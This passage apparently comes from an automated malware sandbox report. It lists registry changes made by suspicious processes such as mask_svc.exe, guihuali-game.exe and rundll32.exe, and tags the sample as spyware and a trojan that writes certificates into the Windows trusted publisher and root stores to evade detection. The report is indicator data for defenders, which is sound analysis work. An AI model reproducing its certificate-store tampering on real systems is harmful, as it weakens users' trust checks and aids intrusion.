Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time"	mask_svc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exerundll32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeguihuali-game.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{Q4J0B7H3-CLFC-AN4E-8Q18-7Q45PB0I3113}\1 = "22"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 29d723769e29d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7162907a9e29d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	guihuali-game.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000000bf53566a3abbc01c5a36d1b2c67fbb83b1920d2070f385cb0098efcb48522e2b2cd5116a8c1ede0cb81ccc90019cd1e234f9a73fbcdfd0e2aa4	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 36a7e5909e29d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000069aebd9889777ca3af59098c4202f7dff91fa103ce72b9215e76dc35e8771f51aa4fb2cf6633751ee044a0e40fdc0e06d6b1cd58505d43bab0d788d003f48ac50efa7d447ed475603a828af314c35637e01c89186dbcfb439ed9e597f48db20be34d7f54a579f37462b1992f5ad7ec42b500982ea4b0a0e6d71c1a513e64070e09ea647ea8443911cb704a1d6238911a9dfd8674ec59f60e9640dec9a1975637706fc5213e54c35a0861aacf5c06a0b7b6b31afa71d87c9714e673500a4896f6ee7d57cc15c9cef92c23630b1461fad42cc2e8db3a4bce4762ac4b40e795982a70b5591942c3877f815581b93f692e7714ca3da7c4d3259f7733499a5ea04e4da9b5e91fc86124196b99f8faf63e02454d6b9753369183f2b01bbbb1918782743f1f7371f9c50896748e32dae900a8b14845bbc827a353d8a60493e40d6c7525469194a6650efebac8d30b53f3cf3af16ef84cf2c82aa7e39d8e6868856da7eec7ace8826f5cfbe42e0a3e63e1cb7ac5902389698146b7b3655a32200cac69e13a11189b9dce410268d25d29df146812df684fac2218aa4d455271fe45671681c769e2b983e2	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fdafb9bb9e29d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{X6S7Y5Y3-WINZ-VP5O-6V75-6M59ZP1Y8621}	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669}\1 = "4668"	svchost.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

vpn.tmpnrl0jkg334t.exeFull Program Features.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	nrl0jkg334t.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	Full Program Features.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Full Program Features.exe
